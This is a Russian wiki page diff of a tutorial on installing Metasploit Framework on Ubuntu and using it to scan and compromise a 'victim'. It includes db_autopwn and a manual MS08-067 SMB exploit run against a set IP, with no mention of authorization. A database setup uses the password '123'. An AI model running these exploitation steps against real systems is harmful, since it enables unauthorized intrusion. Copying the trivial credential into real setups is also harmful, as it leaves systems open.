Различия
Здесь показаны различия между двумя версиями данной страницы.
| Следующая версия | Предыдущая версия | ||
| wiki:metasploit_framework_в_ubuntu [2011/09/27 21:25] создано | wiki:metasploit_framework_в_ubuntu [2012/04/27 08:30] (текущий) | ||
|---|---|---|---|
| Строка 16: | Строка 16: | ||
| Далее скачиваем Metasploit Framework вот тут: | Далее скачиваем Metasploit Framework вот тут: | ||
| - | http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run: | + | http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run: | 
| <code bash> | <code bash> | ||
| - | wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run | + | wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run | 
| - | chmod +x framework-4.*run | + | chmod +x metasploit-latest-linux-installer.run | 
| </code> | </code> | ||
| И запускаем… | И запускаем… | ||
| - | <code bash>sudo ./framework-4.*run</code> | + | <code bash>sudo ./metasploit-latest-linux-installer.run</code> | 
| После установки необходимо обновить Metasploit Framework | После установки необходимо обновить Metasploit Framework | ||
| <code bash>sudo msfupdate</code> | <code bash>sudo msfupdate</code> | ||
| - | Теперь самый простой вариант использованияMetasploit Framework. Запустим консоль. | + | Теперь самый простой вариант использования Metasploit Framework. Запустим консоль. | 
| - | <code bash>Msfconsole</code> | + | <code bash>msfconsole</code> | 
| Теперь добавим нашу жертву в базу данных и информацию про его порты. | Теперь добавим нашу жертву в базу данных и информацию про его порты. | ||
| <code bash>db_nmap -sT -sV 192.168.1.1</code> | <code bash>db_nmap -sT -sV 192.168.1.1</code> | ||
| - | Отправим все на автоматический взлом =). | + | Отправим все на автоматический взлом =). Данная команда стала неактуальной в последних версиях. | 
| <code bash>db_autopwn -p -t -e</code> | <code bash>db_autopwn -p -t -e</code> | ||
| Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее. | Если в конце процесса появятся сессии, значит взлом удался. Выбираем сессию и в ходим в нее. | ||
| <code bash>session -i 1</code> | <code bash>session -i 1</code> | ||
| + | |||
| + | Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так: | ||
| + | |||
| + | <code bash> | ||
| + | #Загружаем нужный нам эксплоит | ||
| + | use exploit/windows/smb/ms08_067_netapi | ||
| + | #Смотрим опции | ||
| + | show options | ||
| + | #Заполняем необходимые поля например IP адрес жертвы | ||
| + | set RHOST 192.168.84.58 | ||
| + | #Проверяем актуален ли эксплоит для жертвы | ||
| + | check | ||
| + | #Ломаем | ||
| + | exploit | ||
| + | </code> | ||
| Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите: | Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите: | ||
| Строка 47: | Строка 62: | ||
| hosts -d 192.168.1.1</code> | hosts -d 192.168.1.1</code> | ||
| + | Иногда Базы данных отваливаются я решил данный вопрос вот так: | ||
| + | <code bash> | ||
| + | sudo apt-get install postgresql | ||
| + | sudo apt-get install libpgsql-ruby | ||
| + | sudo su postgres | ||
| + | createuser root -P | ||
| + | Enter password for new role: 123 | ||
| + | Enter it again:123 | ||
| + | Shall the new role be a | ||
| + | superuser? (y/n) n | ||
| + | Shall the new role be allowed to | ||
| + | create databases? (y/n) n | ||
| + | Shall the new role be allowed to | ||
| + | create more new roles? (y/n) n | ||
| + | createdb --owner=root metasploit | ||
| + | exit | ||
| + | msfconsole | ||
| + | db_connect root:123@127.0.0.1/metasploit | ||
| + | </code> | ||
| + | |||
| + | \\ \\ | ||
| - | ^Автор^Раздел^ | + | Александр Ф Михайлов (ChelAxe) | 
| - | |Михайлов Александр (ChelAxe)|как сделать ...| | + | |
| {{tag>Конкурс}} | {{tag>Конкурс}} | ||
 
			 
	